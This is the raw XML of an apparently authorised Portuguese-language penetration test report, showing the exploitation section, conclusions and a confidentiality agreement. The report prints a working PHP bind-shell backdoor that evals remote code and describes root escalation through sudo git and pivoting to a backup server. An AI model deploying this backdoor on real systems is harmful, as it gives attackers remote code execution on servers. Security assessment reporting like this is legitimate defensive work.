          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5402580" cy="965200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.j10im5u0wa5d" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5402580" cy="838200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.z52plm223mlp" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2) Criando backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098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partir disso criamos um backdoor em PHP para termos acesso tiretamente no servidor, para isso criamos um arquivo malicioso com a ferramenta MSFVENOM para criar um backdoor na porta 9999 do servidor. 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Código malicioso usado para criar o backdoor: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="8508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.93144722524485"/>
        <w:gridCol w:w="8295.068552774756"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="212.93144722524485"/>
            <w:gridCol w:w="8295.068552774756"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4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&lt;?php /**/ error_reporting(0); $ip = '0.0.0.0'; $port = 9999; if (is_callable('stream_socket_server')) { $srvsock = stream_socket_server("tcp://{$ip}:{$port}"); if (!$srvsock) { die(); } $s = stream_socket_accept($srvsock, -1); fclose($srvsock); $s_type = 'stream'; } elseif (is_callable('socket_create_listen')) { $srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } elseif (is_callable('socket_create')) { $srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $res = socket_bind($srvsock, $ip, $port); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } else { die(); } if (!$s) { die(); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) &lt; $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') &amp;&amp; ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();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Depois de criarmos o backdoor e se conectar, é possível identificar que não há um FIREWALL entre o servidor e o atacante, ou qualquer firewall dentro do servidor. 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Conectando a backdoor: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-135.4724409448817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15840" cy="2709426"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="49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27094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Agora que temos acesso ao servidor, seria possível por exemplo: deletar todos os arquivos do servidor e até causando indisponibilidade do serviço. </w:t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5.3 )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Ganhando acesso como ROOT no servidor</w:t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Identificamos que o login do apache ter permissão para rodar o comando git com permissões de root no servidor como mostra a imagem abaixo: </w:t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2094" cy="2410142"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49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094" cy="241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verificar no siste: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https://gtfobins.github.io/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é possivel usar o git para ganhar acesso a um shell com o login root do servidor. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3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usando o git ganhamos acesso como root no servidor como mostra a imagem abaixo: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4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2580" cy="2781300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49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ver que agora temos acesso como root no servidor do sistema, agora, com acesso e controle total sobre o servidor. </w:t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Durante a análise do servidor, identificamos que o mesmo possui acesso SSH ao servidor backup.gopwned.com.br e o servidor de backup tem acesso como root no servidor vmgopwned003.gopwned.com.br. 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Podemos verificar na imagem abaixo, toda a anatomia do ataque:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA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2580" cy="3327400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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BE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C2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CROWSEC SEGURANÇA OFENSIVA conclui este trabalho com objetivo atingido no qual foi possível identificar problemas de segurança e recomendar suas possíveis mitigações.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4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a CONTRATANTE aplicar todas as correções sugeridas a CROWSEC irá executar o Reteste afim de validar as correções aplicadas pelo cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6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já agradecemos a oportunidade em oferecermos nossos serviços profissionais e estamos a sua disposição para qualquer dúvida que considerem pertinentes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8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Corpo Técnico</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0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Carlos Eduardo Vieira </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Penetration Tester / RedTeam </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">contato@crowsec.com.br</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB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0" w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:cs="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neu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851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:cs="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:b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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo I – Acordo de Confidencialidade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:cs="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neu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851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:cs="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neu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(GOPWNED) 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(CROWSEC SEGURANÇA OFENSIVA) acordam entre si:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA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entrega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informação de sua propriedade relativos às</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD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configurações de segurança de seus dispositivos informáticos sujeitos ao objeto da atividade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE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contratada (Teste de Intrusão).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF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A informação entregue pela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 vice-versa, relacionado ao objeto ou</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1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mesmo produto da atividade contratada se constitui Informação Confidencial.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2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 obriga a:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4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a.  Manter em caráter sigiloso a Informação Confidencial e não disponibilizá-la a terceiros</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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sem o consentimento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b. Utilizar a Informação Confidencial exclusivamente para a atividade contratada e tarefas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8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definidas no escopo deste trabalho.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9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c. Restituir toda a Informação Confidencial toda vez que esta for solicitada pela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="708" w:firstLine="850.999999999999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CONTRATANTE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EB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d. Destruir toda Informação Confidencial com solicitação e consentimento da</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC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CONTRATANTE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a qual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deverá provar tal destruição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED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e. Revelar a Informação Confidencial somente às pessoas cujo conhecimento é</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE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indispensável para atender a finalidade da atividade contratada. Estas pessoas devem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF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manter as obrigações aqui previstas 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responderá somente a elas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0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f. Eliminar toda cópia eletrônica e/ou impressa da Informação Confidencial de qualquer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1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equipamento informático ou outros equipamentos de apoio, salvo autorização expressa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2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uma vez que o trabalho seja finalizado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3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4.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está liberada de sua obrigação em guardar segredo da Informação Confidencial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5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caso:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6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a. As evidências fornecidas pela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sejam de prévio conhecimento da</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7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em período anterior à atividade contratada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8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b. As informações sejam publicamente conhecidas sem que resultem no descumprimento</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9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ou de um terceiro sujeito a uma obrigação de confidencialidade.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA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c. Exista uma obrigação jurídica de fornecimento da informação. Neste caso a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB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   CONTRATADA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poderá revelar somente o mínimo de Informação Confidencial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC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necessário para o cumprimento da exigência legal. Neste caso, a informação apenas será</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD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fornecida depois da notificação formal a ambas as partes. Este direito também poderá ser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE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exercido pela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no dia do vencimento do prazo para provimento desta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF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informação, descrito no requerimento jurídico.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100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5.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está ciente que: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, não outorga nenhuma garantia a respeito da Informação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104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Confidencial, salvo que este conteúdo é de sua propriedade e tem todo direito em revelá-la.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105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b. A Informação Confidencial pode conter erros, ser inexata, não ser aplicável ou não se</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106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destinar à questão da atividade contratada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107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CONTRATADA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é exclusivamente responsável pela atualização da Informação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108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Confidencial, o uso que ela outorgue e os efeitos que esta atualização resulte.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109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d. A Informação Confidencial tem um valor estratégico para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CONTRATANTE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A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0" w:firstLine="851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6.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CONTRATANTE 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está ciente que:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C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ind w:left="0" w:firstLine="708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a. Os documentos entregues (impressos ou eletrônicos) serão de acesso exclusivo aos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr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responsáveis pela empresa contratante e/ou área contratante.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId23" w:type="default"/>
      <w:footerReference r:id="rId24" w:type="default"/>
      <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
      <w:pgMar w:bottom="1417" w:top="1417" w:left="1701" w:right="1701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851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-885824</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>228600</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7354253" cy="844507"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="48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1660" y="3444763"/>
                        <a:ext cx="7354253" cy="844507"/>
                        <a:chOff x="2371660" y="3444763"/>
                        <a:chExt cx="5948680" cy="670475"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wpg:grpSp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="2371660" y="3444763"/>
                          <a:ext cx="5948680" cy="670475"/>
                          <a:chOff x="393750" y="3271200"/>
                          <a:chExt cx="7921828" cy="87900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93750" y="3271200"/>
                            <a:ext cx="7921825" cy="87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376423" y="3409795"/>
                            <a:ext cx="5939155" cy="74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40" w:before="0" w:line="360"/>
                                <w:ind w:left="850.9999847412109" w:right="0" w:firstLine="1701.9999694824219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1"/>
                                  <w:smallCaps w:val="0"/>
                                  <w:strike w:val="0"/>
                                  <w:color w:val="ff0000"/>
                                  <w:sz w:val="22"/>
                                  <w:vertAlign w:val="baseline"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> CONFIDENCIAL</w:t>
                              </w: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- 20 de outubro de 2019</w:t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93750" y="3271200"/>
                            <a:ext cx="1982700" cy="27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www.crowsec.com.br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-885824</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>228600</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7354253" cy="844507"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="487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54253" cy="84450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207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LOGO/NOME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-330199</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3633573" cy="277036"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="488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538739" y="3651007"/>
                        <a:ext cx="3614523" cy="25798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850.9999847412109" w:right="0" w:firstLine="1701.9999694824219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Relatório de Pentest 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2616200</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-330199</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3633573" cy="277036"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="48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3573" cy="27703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40" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="85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ind w:left="0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ind w:left="0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2D15D5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elacomgrade">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Tabelanormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="006736F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Fontepargpadro"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="006736F2"/>
    <w:rPr>
      <w:color w:val="0000ff" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="SombreamentoClaro">
    <w:name w:val="Light Shading"/>
    <w:basedOn w:val="Tabelanormal"/>
    <w:uiPriority w:val="60"/>
    <w:rsid w:val="00C95713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mentoClaro-nfase2">
    <w:name w:val="Light Shading Accent 2"/>
    <w:basedOn w:val="Tabelanormal"/>
    <w:uiPriority w:val="60"/>
    <w:rsid w:val="00C95713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paragraph" w:styleId="PargrafodaLista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00C95713"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="apple-converted-space" w:customStyle="1">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:rsid w:val="00BA10E1"/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1F4D7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1F4D70"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:cs="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="SombreamentoClaro-nfase1">
    <w:name w:val="Light Shading Accent 1"/>
    <w:basedOn w:val="Tabelanormal"/>
    <w:uiPriority w:val="60"/>
    <w:rsid w:val="00E21271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paragraph" w:styleId="Cabealho">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CabealhoChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="009D3B4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9D3B4B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Rodap">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="RodapChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="009D3B4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9D3B4B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TtuloChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="009D3B4B"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:color="4f81bd" w:space="4" w:sz="8" w:themeColor="accent1" w:val="single"/>
      </w:pBdr>
      <w:spacing w:after="300" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0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  <w:lang w:eastAsia="pt-BR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TtuloChar" w:customStyle="1">
    <w:name w:val="Título Char"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:link w:val="Ttulo"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="009D3B4B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9D3B4B"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="851"/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  <w:lang w:eastAsia="pt-BR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubttuloChar" w:customStyle="1">
    <w:name w:val="Subtítulo Char"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:link w:val="Subttulo"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="009D3B4B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  <w:lang w:eastAsia="pt-BR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GradeMdia2-nfase1">
    <w:name w:val="Medium Grid 2 Accent 1"/>
    <w:basedOn w:val="Tabelanormal"/>
    <w:uiPriority w:val="68"/>
    <w:rsid w:val="00A96D37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">
    <w:name w:val="Medium Grid 2"/>
    <w:basedOn w:val="Tabelanormal"/>
    <w:uiPriority w:val="68"/>
    <w:rsid w:val="0075030A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SombreamentoMdio2">
    <w:name w:val="Medium Shading 2"/>
    <w:basedOn w:val="Tabelanormal"/>
    <w:uiPriority w:val="64"/>
    <w:rsid w:val="0075030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Clara-nfase4">
    <w:name w:val="Light List Accent 4"/>
    <w:basedOn w:val="Tabelanormal"/>
    <w:uiPriority w:val="61"/>
    <w:rsid w:val="00B16B70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SombreamentoClaro-nfase4">
    <w:name w:val="Light Shading Accent 4"/>
    <w:basedOn w:val="Tabelanormal"/>
    <w:uiPriority w:val="60"/>
    <w:rsid w:val="00B16B70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2D15D5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2D15D5"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:left="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="pt-BR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="SemEspaamento">
    <w:name w:val="No Spacing"/>
    <w:link w:val="SemEspaamentoChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00B07E0E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia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B07E0E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="pt-BR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E42214"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TabeladeGrade4-nfase1">
    <w:name w:val="Grid Table 4 Accent 1"/>
    <w:basedOn w:val="Tabelanormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00940DE4"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:color="95b3d7" w:space="0" w:sz="4" w:themeColor="accent1" w:themeTint="000099" w:val="single"/>
        <w:left w:color="95b3d7" w:space="0" w:sz="4" w:themeColor="accent1" w:themeTint="000099" w:val="single"/>
        <w:bottom w:color="95b3d7" w:space="0" w:sz="4" w:themeColor="accent1" w:themeTint="000099" w:val="single"/>
        <w:right w:color="95b3d7" w:space="0" w:sz="4" w:themeColor="accent1" w:themeTint="000099" w:val="single"/>
        <w:insideH w:color="95b3d7" w:space="0" w:sz="4" w:themeColor="accent1" w:themeTint="000099" w:val="single"/>
        <w:insideV w:color="95b3d7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rPr>
        <w:b w:val="1"/>
        <w:bCs w:val="1"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5f1" w:themeFill="accent1" w:themeFillTint="000033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character" w:styleId="MenoPendente">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fontepargpadro"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00477D5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spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="851"/>
    </w:pPr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0c0c0" w:val="clear"/>
    </w:tc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spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="851"/>
    </w:pPr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0c0c0" w:val="clear"/>
    </w:tc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0c0c0" w:val="clear"/>
    </w:tcPr>
  </w:style>
  <w:style w:type="table" w:styleId="Table3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0c0c0" w:val="clear"/>
    </w:tc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0c0c0" w:val="clear"/>
    </w:tc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  <w:color w:val="5f497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0c0c0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tfobins.github.io/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/in/amanda-pires-063459195/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 